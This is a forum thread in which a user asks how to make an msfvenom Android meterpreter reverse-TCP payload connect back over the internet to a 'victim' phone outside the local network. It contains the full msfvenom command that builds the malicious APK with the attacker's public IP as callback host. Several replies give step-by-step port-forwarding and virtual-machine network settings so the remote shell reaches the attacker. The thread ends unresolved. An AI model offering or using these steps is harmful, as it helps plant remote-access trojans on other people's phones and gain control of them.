Forum Thread: Msfvenom Android Exploitation Outside LAN?

Msfvenom Android Exploitation Outside LAN?

I have had success with msfvenom android payload over LAN but now I want to test it outside LAN. Like when you and the victim are connected to different gateways.

As you guys know that we use our interface's IP in LHOST and LPORT is set to 4444.

Now I want to know what should the LHOST & LPORT be set to in order to make the exploit work outside LAN. I tried inserting my PUBLIC ip and the port 4444 but it didn't work.

Here's the complete command:
msfvenom -p android/meterpreter/reverseunderscoretcp LHOST=My Public IP LPORT =4444 R > exploitname.apk_

Does someone know the correct values for LHOST and LPORT or how to make it work properly?
Thankyou !

11 Responses

for the msfvenom command , you must write your PUBLIC IP
but when you start your listener you must write then your INTERNAL ADRESS .
but you have to forward the port in your router to your IP . the procedure depends on your routers brand

  1. Your public IP ==> LHOST
  2. Pick any port that isn't used by other processes ==> LPORT
  3. Setup port forwarding on your router. Dig around your router settings and find the option to port forward. You must forward LPORT and set the IP address to your local IP address.
  4. Try again

If you need any help, feel free to ask.

You need to make sure you port forward your router. For example, if you are using the default port 4444 then you need to port forward your internal ip address to that port. You can gain access to your routers page by typing "route -n" in kali and putting the default gateway address in your browser . Also, when I first began to do this, it didn't work for me right away because I DIDN'T CHOOSE UDP AND TCP. Make sure you have both set. After that, it should work for you. Any questions, feel free to ask!

Here's my router's page. What should I do exactly?

Click on the Add new rule button, and set the following options:
ACTIVE = yes (or equivalent)
SERVICE NAME = doesn't matter
Ext/Int -ernal Port = LPORT, all four must be the same
SERVER IP ADDRESS = your ip address (local not public e.g.
MODIFY = that will turn into an edit me option once a port rule is set


Here's the add new rule page. What am I supposed to put into External start and end ports?
I'm assuming the Protocol must be set to TCP, right?
And what about the last 2 fields?

you must put the port 4444 ( the one that you used in metasploit )
for both external start and end port .
server ip adress is your local IP

I'm using Kali in a VM environment. That means one wireless card is working inside Kali and the other is meant for Windows. And ofcourse both of them are assigned different IPv4 addresses by the DHCP. So, which one am I supposed to insert in the SERVER IP ADDRESS?

check the VM network configuration , and insert that ip , dont insert the windows internal IP ADRESS

Tried it with the internal ip of Kali, didn't work.

What about the VM network config you are saying? Its set to NAT. What modifications do I need to make there? Could you be a little more specific?

Share Your Thoughts

  • Hot
  • Active